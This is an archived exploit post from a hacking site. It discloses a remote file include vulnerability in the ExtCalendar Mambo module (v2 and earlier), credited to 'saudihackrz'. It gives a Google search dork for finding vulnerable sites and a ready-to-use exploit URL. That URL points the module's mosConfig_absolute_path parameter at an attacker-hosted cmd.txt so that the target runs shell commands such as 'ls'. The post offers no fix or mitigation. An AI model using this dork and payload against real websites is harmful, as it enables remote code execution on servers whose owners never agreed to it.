AOH :: Web :: PHP :: B06-3704.HTM

ExtCalendar Mambo Module <= v2( extcalendar.php ) Remote File Include Vulnerabilities

ExtCalendar Mambo Module <= v2( extcalendar.php ) Remote File Include Vulnerabilities
ExtCalendar Mambo Module <= v2( extcalendar.php ) Remote File Include Vulnerabilities


--------------------------------------------------------------------------------=0D
Title : ExtCalendar Mambo Module <= v2 Remote File Include Vulnerabilities=0D
###############################################################################=0D
=0D
Discovered By saudihackrz=0D
-----------------------------------------------------------------------------=0D
=0D
google        : "powered by ExtCalendar v2"=0D
Exploit     :  =0D
http://[target]/[path]/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://[attacker]/cmd.txt?&cmd=ls =0D 
               =0D
-----------------------------------------------------------------------------=0D
=0D
greatz:=0D
~~~~~=0D
SnIpEr.SA , KING18, BLACK HOURS, AL-ARAAB,=0D
-------------------------------------------------------------------------------=0D
=0D
Contact:=0D
~~~~~~~=0D
=0D
Nick: saudi hackrz=0D
E-mail: saudi.unix[at]hotmail[dot]Com=0D
site: http://www.3asfh.net=0D 
=0D
=0D
=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.